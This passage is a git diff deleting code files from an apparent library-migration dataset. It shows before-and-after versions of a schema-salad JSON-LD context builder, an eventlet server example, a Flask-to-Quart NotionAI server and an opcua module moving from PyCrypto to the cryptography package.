Dict[str, rdflib.namespace.Namespace]) -> Union[Dict, str] - split = urlparse.urlsplit(name) - - vee = None # type: Union[str, unicode] - - if split.scheme: - vee = name - (ns, ln) = rdflib.namespace.split_uri(unicode(vee)) - name = ln - if ns[0:-1] in namespaces: - vee = unicode(namespaces[ns[0:-1]][ln]) - _logger.debug("name, v %s %s", name, vee) - - v = None # type: Any - - if field and "jsonldPredicate" in field: - if isinstance(field["jsonldPredicate"], dict): - v = {} - for k, val in field["jsonldPredicate"].items(): - v[("@" + k[1:] if k.startswith("_") else k)] = val - else: - v = field["jsonldPredicate"] - elif "jsonldPredicate" in datatype: - if isinstance(datatype["jsonldPredicate"], collections.Iterable): - for d in datatype["jsonldPredicate"]: - if isinstance(d, dict): - if d["symbol"] == name: - v = d["predicate"] - else: - raise Exception( - "entries in the jsonldPredicate List must be " - "Dictionaries") - else: - raise Exception("jsonldPredicate must be a List of Dictionaries.") - # if not v: - # if field and "jsonldPrefix" in field: - # defaultBase = field["jsonldPrefix"] - # elif "jsonldPrefix" in datatype: - # defaultBase = datatype["jsonldPrefix"] - - ret = v or vee - - if not ret: - ret = defaultBase + name - - if name in context: - if context[name] != ret: - raise Exception("Predicate collision on %s, '%s' != '%s'" % - (name, context[name], ret)) - else: - _logger.debug("Adding to context '%s' %s (%s)", name, ret, type(ret)) - context[name] = ret - - return ret - - -def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - # type: (Dict[str, Any], Graph, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace], str) -> None - if t["type"] == "record": - recordname = t["name"] - - _logger.debug("Processing record %s\n", t) - - classnode = URIRef(recordname) - g.add((classnode, RDF.type, RDFS.Class)) - - split = urlparse.urlsplit(recordname) - if "jsonldPrefix" in t: - predicate = "%s:%s" % (t["jsonldPrefix"], recordname) - elif split.scheme: - (ns, ln) = rdflib.namespace.split_uri(unicode(recordname)) - predicate = recordname - recordname = ln - else: - predicate = "%s:%s" % (defaultPrefix, recordname) - - if context.get(recordname, predicate) != predicate: - raise Exception("Predicate collision on '%s', '%s' != '%s'" % ( - recordname, context[recordname], predicate)) - - if not recordname: - raise Exception() - - _logger.debug("Adding to context '%s' %s (%s)", - recordname, predicate, type(predicate)) - context[recordname] = predicate - - for i in t.get("fields", []): - fieldname = i["name"] - - _logger.debug("Processing field %s", i) - - v = pred(t, i, fieldname, context, defaultPrefix, namespaces) - - if isinstance(v, basestring): - v = v if v[0] != "@" else None - else: - v = v["_@id"] if v.get("_@id", "@")[0] != "@" else None - - if v: - (ns, ln) = rdflib.namespace.split_uri(unicode(v)) - if ns[0:-1] in namespaces: - propnode = namespaces[ns[0:-1]][ln] - else: - propnode = URIRef(v) - - g.add((propnode, RDF.type, RDF.Property)) - g.add((propnode, RDFS.domain, classnode)) - - # TODO generate range from datatype. 
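process_type above registers each record as an RDFS class and each field as an RDF property on the graph. A reduced sketch of those rdflib calls with a hypothetical record name (output shown for rdflib 6+, where serialize returns a str):

from rdflib import Graph, URIRef
from rdflib.namespace import RDF, RDFS, Namespace

g = Graph()
g.bind("ex", Namespace("https://example.org/schema#"))  # like g.bind(k, v) above

classnode = URIRef("https://example.org/schema#Record")  # hypothetical recordname
g.add((classnode, RDF.type, RDFS.Class))

propnode = URIRef("https://example.org/schema#fieldA")  # hypothetical field predicate
g.add((propnode, RDF.type, RDF.Property))
g.add((propnode, RDFS.domain, classnode))

print(g.serialize(format="turtle"))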
- - if isinstance(i["type"], dict) and "name" in i["type"]: - process_type(i["type"], g, context, defaultBase, - namespaces, defaultPrefix) - - if "extends" in t: - for e in aslist(t["extends"]): - g.add((classnode, RDFS.subClassOf, URIRef(e))) - elif t["type"] == "enum": - _logger.debug("Processing enum %s", t["name"]) - - for i in t["symbols"]: - pred(t, None, i, context, defaultBase, namespaces) - - -def salad_to_jsonld_context(j, schema_ctx): - # type: (Iterable, Dict[str, Any]) -> Tuple[Loader.ContextType, Graph] - context = {} # type: Loader.ContextType - namespaces = {} - g = Graph() - defaultPrefix = "" - - for k, v in schema_ctx.items(): - context[k] = v - namespaces[k] = rdflib.namespace.Namespace(v) - - if "@base" in context: - defaultBase = cast(str, context["@base"]) - del context["@base"] - else: - defaultBase = "" - - for k, v in namespaces.items(): - g.bind(k, v) - - for t in j: - process_type(t, g, context, defaultBase, namespaces, defaultPrefix) - - return (context, g) diff --git a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff b/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff deleted file mode 100644 index 3821684..0000000 --- a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff +++ /dev/null @@ -1,25 +0,0 @@ -diff --git a/examples/run_gevent.py b/examples/run_eventlet.py - index d502899a360447682cdb7e618507edab94b40c0c..d707ff652fd74c3420e83a50fc9b1b9026ed0d98 100644 - --- a/examples/run_gevent.py - +++ b/examples/run_eventlet.py -@@ -1,8 +1,9 @@ -+from eventlet import wsgi, patcher -+patcher.monkey_patch() -+ - import sys - import getopt --from gevent import monkey --monkey.patch_all() --from gevent.pywsgi import WSGIServer -+import eventlet - from examples.wsgi import application - - -@@ -11,5 +12,5 @@ opts, _ = getopt.getopt(sys.argv[1:], "b:") - for opt, value in opts: - if opt == '-b': - addr, port = value.split(":") --server = WSGIServer((addr, int(port)), application) --server.serve_forever() -+ -+wsgi.server(eventlet.listen((addr, int(port))), application) diff --git a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py b/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py deleted file mode 100644 index 7a0e1db..0000000 --- a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py +++ /dev/null @@ -1,15 +0,0 @@ -import sys -import getopt -from gevent import monkey -monkey.patch_all() -from gevent.pywsgi import WSGIServer -from examples.wsgi import application - - -addr, port = '127.0.0.1', 8000 -opts, _ = getopt.getopt(sys.argv[1:], "b:") -for opt, value in opts: - if opt == '-b': - addr, port = value.split(":") -server = WSGIServer((addr, int(port)), application) -server.serve_forever() diff --git a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py b/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py deleted file mode 100644 index 2fca4c0..0000000 --- a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py +++ /dev/null @@ -1,16 +0,0 @@ -from eventlet import wsgi, patcher -patcher.monkey_patch() - -import sys -import getopt -import eventlet -from examples.wsgi import application - - -addr, port = '127.0.0.1', 8000 -opts, _ = getopt.getopt(sys.argv[1:], "b:") -for opt, value in opts: - if opt == '-b': - addr, port = value.split(":") - -wsgi.server(eventlet.listen((addr, int(port))), 
application) diff --git a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff b/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff deleted file mode 100644 index 16739aa..0000000 --- a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff +++ /dev/null @@ -1,225 +0,0 @@ -diff --git a/Python Server/app/server.py b/Python Server/app/server.py - index a0b14922f3153e4a793022cebf370d23dbb61a46..002f5bde5d5d5f2eaaf6999e41e4619817c10400 100644 - --- a/Python Server/app/server.py - +++ b/Python Server/app/server.py -@@ -1,23 +1,18 @@ --import os - import logging - --from flask import send_from_directory --from flask import render_template --from flask import Flask, flash, request, redirect, url_for -+from quart import Quart, render_template, flash, request, redirect - from werkzeug.utils import secure_filename - --import json - import secrets - --from utils import ask_server_port, save_options, save_data, append_data, createFolder -+from utils import ask_server_port, save_options, save_data, createFolder - from NotionAI import * - --from threading import Thread -- - UPLOAD_FOLDER = '../app/uploads/' --ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif']) -+ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif','webp']) -+ -+app = Quart(__name__) - --app = Flask(__name__) - app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER - logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s', - level=logging.INFO) -@@ -26,45 +21,25 @@ notion = NotionAI(logging) - - - @app.route('/add_url_to_mind') --def add_url_to_mind(): -+async def add_url_to_mind(): - url = request.args.get('url') - title = request.args.get('title') -- thread = Thread(target=notion.add_url_to_database, args=(url, title)) -- thread.daemon = True -- thread.start() -- return "200" -+ return str(notion.add_url_to_database(url, title)) - - - @app.route('/add_text_to_mind') --def add_text_to_mind(): -+async def add_text_to_mind(): - url = request.args.get('url') - text = request.args.get('text') -- thread = Thread(target=notion.add_text_to_database, args=(str(text), str(url))) -- thread.daemon = True -- thread.start() -- return "200" -+ return str(notion.add_text_to_database(text, url)) - - - @app.route('/add_image_to_mind') --def add_image_to_mind(): -+async def add_image_to_mind(): - url = request.args.get('url') - image_src = request.args.get('image_src') - image_src_url = request.args.get('image_src_url') -- thread = Thread(target=notion.add_image_to_database, args=(str(url), str(image_src), str(image_src_url))) -- thread.daemon = True -- thread.start() -- return "200" -- -- --@app.route('/add_video_to_mind') --def add_video_to_mind(): -- url = request.args.get('url') -- video_src = request.args.get('video_src') -- video_src_url = request.args.get('video_src_url') -- -- # notion.add_text_to_database(str(url),str(text)) -- # print(str(notion.statusCode)) -- return str(notion.statusCode) -+ return str(notion.add_image_to_database(url, image_src, image_src_url)) - - - def allowed_file(filename): -@@ -72,55 +47,41 @@ def allowed_file(filename): - filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS - - --@app.route('/upload_file', methods=['GET', 'POST']) --def upload_file(): -+@app.route('/upload_file', methods=['POST']) -+async def upload_file(): - createFolder("uploads") -- if request.method == 'POST': -- # check if the post request has the file part -- if 'file' not 
in request.files: -- flash('No file part') -- return redirect(request.url) -- file = request.files['file'] -- # if user does not select file, browser also -- # submit an empty part without filename -- if file.filename == '': -- flash('No selected file') -- return redirect(request.url) -- if file and allowed_file(file.filename): -- filename = secure_filename(file.filename) -- file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) -- uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) -- -- thread = Thread(target=notion.add_image_to_database_by_post,args=(uri,)) -- thread.daemon = True -- thread.start() -- # notion.add_image_to_database_by_post(os.path.join(app.config['UPLOAD_FOLDER'], filename)) -- return "File Uploaded Succesfully" -- -- --@app.route('/add_audio_to_mind') --def add_audio_to_mind(): -- url = request.args.get('url') -- audio_src = request.args.get('audio_src') -- audio_src_url = request.args.get('audio_src_url') -- -- # notion.add_text_to_database(str(url),str(text)) -- # print(str(notion.statusCode)) -- return str(notion.statusCode) -+ status_code = 200 -+ # check if the post request has the file part -+ request_files = await request.files -+ -+ if 'file' not in request_files: -+ flash('No file part') -+ status_code = 500 -+ -+ file = request_files['file'] -+ # if user does not select file, browser also -+ # submit an empty part without filename -+ if file.filename == '': -+ flash('No selected file') -+ status_code = 500 -+ if file and allowed_file(file.filename): -+ filename = secure_filename(file.filename) -+ file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) -+ uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) -+ return str(notion.add_image_to_database(uri)) -+ else: -+ print("This file is not allowed to be post") -+ status_code = 500 -+ return str(notion.create_json_response(status_code=status_code)) - - - @app.route('/get_current_mind_url') --def get_current_mind_url(): -+async def get_current_mind_url(): - return str(notion.data['url']) - - --@app.route('/get_notion_token_v2') --def get_notion_token_v2(): -- return str(notion.data['token']) -- -- - @app.route('/update_notion_tokenv2') --def update_notion_tokenv2(): -+async def update_notion_tokenv2(): - token_from_extension = request.args.get('tokenv2') - changed = False - with open('data.json') as json_file: -@@ -145,38 +106,44 @@ def update_notion_tokenv2(): - - - @app.route('/') --def show_settings_home_menu(): -- return render_template("options.html") -+async def show_settings_home_menu(): -+ return await render_template("options.html") - - - @app.route('/handle_data', methods=['POST']) --def handle_data(): -- notion_url = request.form['notion_url'] -- notion_token = request.form['notion_token'] -+async def handle_data(): -+ data = await request.get_json() -+ print(data) -+ notion_url = data['notion_url'] -+ -+ notion_token = data['notion_token'] - -- use_email = request.form['email'] and request.form['password'] -+ use_email = data['email'] and data['password'] - -- if request.form['clarifai_key']: -- clarifai_key = request.form['clarifai_key'] -+ if data['clarifai_key']: -+ clarifai_key = data['clarifai_key'] - save_data(logging, url=notion_url, token=notion_token, clarifai_key=clarifai_key) - use_clarifai = True - else: - save_data(logging, url=notion_url, token=notion_token) - use_clarifai = False - -- delete_after_tagging = request.form.getlist('delete_after_tagging') -+ if "delete_after_tagging" in data: -+ delete_after_tagging = data['delete_after_tagging'] -+ else: -+ 
delete_after_tagging = False - - save_options(logging, use_clarifai=use_clarifai, delete_after_tagging=delete_after_tagging) - - if use_email: -- has_run = notion.run(logging, email=request.form['email'], password=request.form['password']) -+ has_run = notion.run(logging, email=data['email'], password=data['password']) - else: - has_run = notion.run(logging) - - if has_run: -- return render_template("thank_you.html") -+ return "200" - else: -- return render_template("error.html") -+ return "500" - - - if __name__ == "__main__": diff --git a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py b/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py deleted file mode 100644 index ecb4d00..0000000 --- a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py +++ /dev/null @@ -1,186 +0,0 @@ -import os -import logging - -from flask import send_from_directory -from flask import render_template -from flask import Flask, flash, request, redirect, url_for -from werkzeug.utils import secure_filename - -import json -import secrets - -from utils import ask_server_port, save_options, save_data, append_data, createFolder -from NotionAI import * - -from threading import Thread - -UPLOAD_FOLDER = '../app/uploads/' -ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif']) - -app = Flask(__name__) -app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER -logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s', - level=logging.INFO) - -notion = NotionAI(logging) - - -@app.route('/add_url_to_mind') -def add_url_to_mind(): - url = request.args.get('url') - title = request.args.get('title') - thread = Thread(target=notion.add_url_to_database, args=(url, title)) - thread.daemon = True - thread.start() - return "200" - - -@app.route('/add_text_to_mind') -def add_text_to_mind(): - url = request.args.get('url') - text = request.args.get('text') - thread = Thread(target=notion.add_text_to_database, args=(str(text), str(url))) - thread.daemon = True - thread.start() - return "200" - - -@app.route('/add_image_to_mind') -def add_image_to_mind(): - url = request.args.get('url') - image_src = request.args.get('image_src') - image_src_url = request.args.get('image_src_url') - thread = Thread(target=notion.add_image_to_database, args=(str(url), str(image_src), str(image_src_url))) - thread.daemon = True - thread.start() - return "200" - - -@app.route('/add_video_to_mind') -def add_video_to_mind(): - url = request.args.get('url') - video_src = request.args.get('video_src') - video_src_url = request.args.get('video_src_url') - - # notion.add_text_to_database(str(url),str(text)) - # print(str(notion.statusCode)) - return str(notion.statusCode) - - -def allowed_file(filename): - return '.' 
in filename and \ - filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS - - -@app.route('/upload_file', methods=['GET', 'POST']) -def upload_file(): - createFolder("uploads") - if request.method == 'POST': - # check if the post request has the file part - if 'file' not in request.files: - flash('No file part') - return redirect(request.url) - file = request.files['file'] - # if user does not select file, browser also - # submit an empty part without filename - if file.filename == '': - flash('No selected file') - return redirect(request.url) - if file and allowed_file(file.filename): - filename = secure_filename(file.filename) - file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) - uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) - - thread = Thread(target=notion.add_image_to_database_by_post,args=(uri,)) - thread.daemon = True - thread.start() - # notion.add_image_to_database_by_post(os.path.join(app.config['UPLOAD_FOLDER'], filename)) - return "File Uploaded Succesfully" - - -@app.route('/add_audio_to_mind') -def add_audio_to_mind(): - url = request.args.get('url') - audio_src = request.args.get('audio_src') - audio_src_url = request.args.get('audio_src_url') - - # notion.add_text_to_database(str(url),str(text)) - # print(str(notion.statusCode)) - return str(notion.statusCode) - - -@app.route('/get_current_mind_url') -def get_current_mind_url(): - return str(notion.data['url']) - - -@app.route('/get_notion_token_v2') -def get_notion_token_v2(): - return str(notion.data['token']) - - -@app.route('/update_notion_tokenv2') -def update_notion_tokenv2(): - token_from_extension = request.args.get('tokenv2') - changed = False - with open('data.json') as json_file: - options = json.load(json_file) - - if token_from_extension != options['token']: - try: - options['token'] = token_from_extension - - client = NotionClient(token_v2=options['token']) # if can't make a client out of the token, it is not - # a correct one. 
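
# The server.py pair in this file records a Flask-to-Quart migration. A minimal
# sketch of the recurring pattern, assuming a hypothetical app of my own rather
# than the project's: handlers become coroutines, and Quart's request payloads
# and render_template must be awaited. Quart deliberately mirrors Flask's API,
# which is why the diff above mostly adds async/await instead of restructuring.
import os

from quart import Quart, render_template, request

app = Quart(__name__)
app.config['UPLOAD_FOLDER'] = 'uploads'  # illustrative path


@app.route('/upload_file', methods=['POST'])
async def upload_file():
    request_files = await request.files  # awaitable in Quart, a plain dict in Flask
    if 'file' not in request_files:
        return "No file part", 400
    file = request_files['file']
    file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))
    return "200"


@app.route('/')
async def home():
    return await render_template("options.html")  # render_template is awaited too
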
- - a_file = open("data.json", "w") - json.dump(options, a_file) - a_file.close() - - logging.info("Token v2 changed to {}".format(token_from_extension)) - changed = notion.run() - except requests.exceptions.HTTPError: - logging.info("Incorrect token V2 from notion") - return str(changed) - - -@app.route('/') -def show_settings_home_menu(): - return render_template("options.html") - - -@app.route('/handle_data', methods=['POST']) -def handle_data(): - notion_url = request.form['notion_url'] - notion_token = request.form['notion_token'] - - use_email = request.form['email'] and request.form['password'] - - if request.form['clarifai_key']: - clarifai_key = request.form['clarifai_key'] - save_data(logging, url=notion_url, token=notion_token, clarifai_key=clarifai_key) - use_clarifai = True - else: - save_data(logging, url=notion_url, token=notion_token) - use_clarifai = False - - delete_after_tagging = request.form.getlist('delete_after_tagging') - - save_options(logging, use_clarifai=use_clarifai, delete_after_tagging=delete_after_tagging) - - if use_email: - has_run = notion.run(logging, email=request.form['email'], password=request.form['password']) - else: - has_run = notion.run(logging) - - if has_run: - return render_template("thank_you.html") - else: - return render_template("error.html") - - -if __name__ == "__main__": - secret = secrets.token_urlsafe(32) - app.secret_key = secret - port = ask_server_port(logging) - app.run(host="0.0.0.0", port=port, debug=True) diff --git a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py b/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py deleted file mode 100644 index c9c4da0..0000000 --- a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py +++ /dev/null @@ -1,153 +0,0 @@ -import logging - -from quart import Quart, render_template, flash, request, redirect -from werkzeug.utils import secure_filename - -import secrets - -from utils import ask_server_port, save_options, save_data, createFolder -from NotionAI import * - -UPLOAD_FOLDER = '../app/uploads/' -ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif','webp']) - -app = Quart(__name__) - -app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER -logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s', - level=logging.INFO) - -notion = NotionAI(logging) - - -@app.route('/add_url_to_mind') -async def add_url_to_mind(): - url = request.args.get('url') - title = request.args.get('title') - return str(notion.add_url_to_database(url, title)) - - -@app.route('/add_text_to_mind') -async def add_text_to_mind(): - url = request.args.get('url') - text = request.args.get('text') - return str(notion.add_text_to_database(text, url)) - - -@app.route('/add_image_to_mind') -async def add_image_to_mind(): - url = request.args.get('url') - image_src = request.args.get('image_src') - image_src_url = request.args.get('image_src_url') - return str(notion.add_image_to_database(url, image_src, image_src_url)) - - -def allowed_file(filename): - return '.' 
in filename and \ - filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS - - -@app.route('/upload_file', methods=['POST']) -async def upload_file(): - createFolder("uploads") - status_code = 200 - # check if the post request has the file part - request_files = await request.files - - if 'file' not in request_files: - flash('No file part') - status_code = 500 - - file = request_files['file'] - # if user does not select file, browser also - # submit an empty part without filename - if file.filename == '': - flash('No selected file') - status_code = 500 - if file and allowed_file(file.filename): - filename = secure_filename(file.filename) - file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) - uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) - return str(notion.add_image_to_database(uri)) - else: - print("This file is not allowed to be post") - status_code = 500 - return str(notion.create_json_response(status_code=status_code)) - - -@app.route('/get_current_mind_url') -async def get_current_mind_url(): - return str(notion.data['url']) - - -@app.route('/update_notion_tokenv2') -async def update_notion_tokenv2(): - token_from_extension = request.args.get('tokenv2') - changed = False - with open('data.json') as json_file: - options = json.load(json_file) - - if token_from_extension != options['token']: - try: - options['token'] = token_from_extension - - client = NotionClient(token_v2=options['token']) # if can't make a client out of the token, it is not - # a correct one. - - a_file = open("data.json", "w") - json.dump(options, a_file) - a_file.close() - - logging.info("Token v2 changed to {}".format(token_from_extension)) - changed = notion.run() - except requests.exceptions.HTTPError: - logging.info("Incorrect token V2 from notion") - return str(changed) - - -@app.route('/') -async def show_settings_home_menu(): - return await render_template("options.html") - - -@app.route('/handle_data', methods=['POST']) -async def handle_data(): - data = await request.get_json() - print(data) - notion_url = data['notion_url'] - - notion_token = data['notion_token'] - - use_email = data['email'] and data['password'] - - if data['clarifai_key']: - clarifai_key = data['clarifai_key'] - save_data(logging, url=notion_url, token=notion_token, clarifai_key=clarifai_key) - use_clarifai = True - else: - save_data(logging, url=notion_url, token=notion_token) - use_clarifai = False - - if "delete_after_tagging" in data: - delete_after_tagging = data['delete_after_tagging'] - else: - delete_after_tagging = False - - save_options(logging, use_clarifai=use_clarifai, delete_after_tagging=delete_after_tagging) - - if use_email: - has_run = notion.run(logging, email=data['email'], password=data['password']) - else: - has_run = notion.run(logging) - - if has_run: - return "200" - else: - return "500" - - -if __name__ == "__main__": - secret = secrets.token_urlsafe(32) - app.secret_key = secret - port = ask_server_port(logging) - app.run(host="0.0.0.0", port=port, debug=True) diff --git a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff b/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff deleted file mode 100644 index 90fadfe..0000000 --- a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff +++ /dev/null @@ -1,161 +0,0 @@ -diff --git a/opcua/uacrypto.py b/opcua/uacrypto.py - index 64e049595105c46600316e6ff2e127a329c6a219..cdaff1575780a99ab035abb08a6ad13414cd4859 100644 - --- a/opcua/uacrypto.py - +++ b/opcua/uacrypto.py -@@ 
-1,113 +1,63 @@ --from Crypto.Util.asn1 import DerSequence --from ssl import PEM_cert_to_DER_cert --from ssl import DER_cert_to_PEM_cert --import base64 --import hashlib -+import os - -+from cryptography import x509 -+from cryptography.hazmat.backends import default_backend -+from cryptography.hazmat.primitives import serialization -+from cryptography.hazmat.primitives import hashes -+from cryptography.hazmat.primitives.asymmetric import padding - --from Crypto.Signature import PKCS1_v1_5 --from Crypto.Hash import SHA256 --from Crypto.Hash import SHA --from Crypto.PublicKey import RSA --from Crypto.Cipher import AES --from Crypto.Cipher import PKCS1_OAEP --from Crypto import Hash --from Crypto import Random - --BS = 16 --pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) --unpad = lambda s: s[:-ord(s[len(s) - 1:])] -+def load_certificate(path): -+ _, ext = os.path.splitext(path) -+ with open(path, "br") as f: -+ if ext == ".pem": -+ return x509.load_pem_x509_certificate(f.read(), default_backend()) -+ else: -+ return x509.load_der_x509_certificate(f.read(), default_backend()) - - --def dem_to_der(data): -- """ -- ssh.PEM_cert_to_DER_cert seems to have issues with python3 bytes, so we wrap it -- """ -- data = PEM_cert_to_DER_cert(data.decode("utf8")) -- return data -+def x509_from_der(data): -+ if not data: -+ return None -+ return x509.load_der_x509_certificate(data, default_backend()) - - --def encrypt_aes(key, raw): -- #key = hashlib.sha256(key.encode()).digest() -- key = key.exportKey(format="DER") -- raw = pad(raw) -- iv = Random.new().read(AES.block_size) -- cipher = AES.new(key, AES.MODE_CBC, iv) -- return base64.b64encode(iv + cipher.encrypt(raw)) -+def load_private_key(path): -+ with open(path, "br") as f: -+ return serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) - - --def decrypt_aes(key, enc): -- enc = base64.b64decode(enc) -- iv = enc[:16] -- cipher = AES.new(key, AES.MODE_CBC, iv) -- return unpad(cipher.decrypt(enc[16:])) -+def der_from_x509(certificate): -+ if certificate is None: -+ return b"" -+ return certificate.public_bytes(serialization.Encoding.DER) - - --def encrypt_rsa_oaep(privkey, data): -- if not type(privkey) is RSA._RSAobj: -- privkey = RSA.importKey(privkey) -- cipher = PKCS1_OAEP.new(privkey, Hash.SHA256) -- #cipher = PKCS1_OAEP.new(privkey, Hash.SHA) -- ciphertext = cipher.encrypt(data) -- return ciphertext -- -- --def pubkey_from_dercert(der): -- cert = DerSequence() -- cert.decode(der) -- tbsCertificate = DerSequence() -- tbsCertificate.decode(cert[0]) -- subjectPublicKeyInfo = tbsCertificate[6] -- -- # Initialize RSA key -- rsa_key = RSA.importKey(subjectPublicKeyInfo) -- return rsa_key -- -- --def sign_sha256(key, data): -- if not type(key) is RSA._RSAobj: -- key = RSA.importKey(key) -- myhash = SHA256.new(data).digest() -- signature = key.sign(myhash, '') -- return signature -+def sign_sha1(private_key, data): -+ signer = private_key.signer( -+ padding.PKCS1v15(), -+ hashes.SHA1() -+ ) -+ signer.update(data) -+ return signer.finalize() - - --def sign_sha1(key, data): -- if not type(key) is RSA._RSAobj: -- key = RSA.importKey(key) -- myhash = SHA.new(data) -- signer = PKCS1_v1_5.new(key) -- signature = signer.sign(myhash) -- return signature -- -- -+def encrypt_basic256(public_key, data): -+ ciphertext = public_key.encrypt( -+ data, -+ padding.OAEP( -+ mgf=padding.MGF1(algorithm=hashes.SHA256()), -+ algorithm=hashes.SHA256(), -+ label=None) -+ ) -+ return ciphertext - - - if __name__ == "__main__": -- 
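
# The uacrypto.py diff above replaces PyCrypto with the cryptography package.
# A minimal sketch of the replacement calls, following the diff; sign_sha1 here
# uses the current one-shot sign() API rather than the signer()/update()/
# finalize() flow shown above, which newer cryptography releases removed.
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding


def load_pem_certificate(path):
    # PEM and DER inputs use separate x509 loaders, as in the diff.
    with open(path, "rb") as f:
        return x509.load_pem_x509_certificate(f.read(), default_backend())


def load_private_key(path):
    with open(path, "rb") as f:
        return serialization.load_pem_private_key(f.read(), password=None,
                                                  backend=default_backend())


def sign_sha1(private_key, data):
    return private_key.sign(data, padding.PKCS1v15(), hashes.SHA1())
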
import OpenSSL - # Convert from PEM to DER -- pem = open("../examples/server_cert.pem").read() -- der = PEM_cert_to_DER_cert(pem) -- rsa_pubkey = pubkey_from_dercert(der) -- priv_pem = open("../examples/mykey.pem").read() -- rsa_privkey = RSA.importKey(priv_pem) -- #lines = pem.replace(" ",'').split() -- #der = a2b_base64(''.join(lines[1:-1])) -- cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, pem) -- -+ cert = load_certificate("../examples/server_cert.pem") -+ #rsa_pubkey = pubkey_from_dercert(der) -+ rsa_privkey = load_private_key("../examples/mykey.pem") - -- # Extract subjectPublicKeyInfo field from X.509 certificate (see RFC3280) -- #cert = DerSequence() -- #cert.decode(der) -- #tbsCertificate = DerSequence() -- #tbsCertificate.decode(cert[0]) -- #subjectPublicKeyInfo = tbsCertificate[6] -- -- # Initialize RSA key -- #rsa_key = RSA.importKey(subjectPublicKeyInfo) -- print("Pub Key", rsa_pubkey) -- print("Priv Key", rsa_privkey) -- msg = encrypt256(rsa_privkey, b"this is my message") -- print("Encrypted data: ", msg) - from IPython import embed - embed() diff --git a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py b/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py deleted file mode 100644 index 1d5ebf3..0000000 --- a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py +++ /dev/null @@ -1,113 +0,0 @@ -from Crypto.Util.asn1 import DerSequence -from ssl import PEM_cert_to_DER_cert -from ssl import DER_cert_to_PEM_cert -import base64 -import hashlib - - -from Crypto.Signature import PKCS1_v1_5 -from Crypto.Hash import SHA256 -from Crypto.Hash import SHA -from Crypto.PublicKey import RSA -from Crypto.Cipher import AES -from Crypto.Cipher import PKCS1_OAEP -from Crypto import Hash -from Crypto import Random - -BS = 16 -pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) -unpad = lambda s: s[:-ord(s[len(s) - 1:])] - - -def dem_to_der(data): - """ - ssh.PEM_cert_to_DER_cert seems to have issues with python3 bytes, so we wrap it - """ - data = PEM_cert_to_DER_cert(data.decode("utf8")) - return data - - -def encrypt_aes(key, raw): - #key = hashlib.sha256(key.encode()).digest() - key = key.exportKey(format="DER") - raw = pad(raw) - iv = Random.new().read(AES.block_size) - cipher = AES.new(key, AES.MODE_CBC, iv) - return base64.b64encode(iv + cipher.encrypt(raw)) - - -def decrypt_aes(key, enc): - enc = base64.b64decode(enc) - iv = enc[:16] - cipher = AES.new(key, AES.MODE_CBC, iv) - return 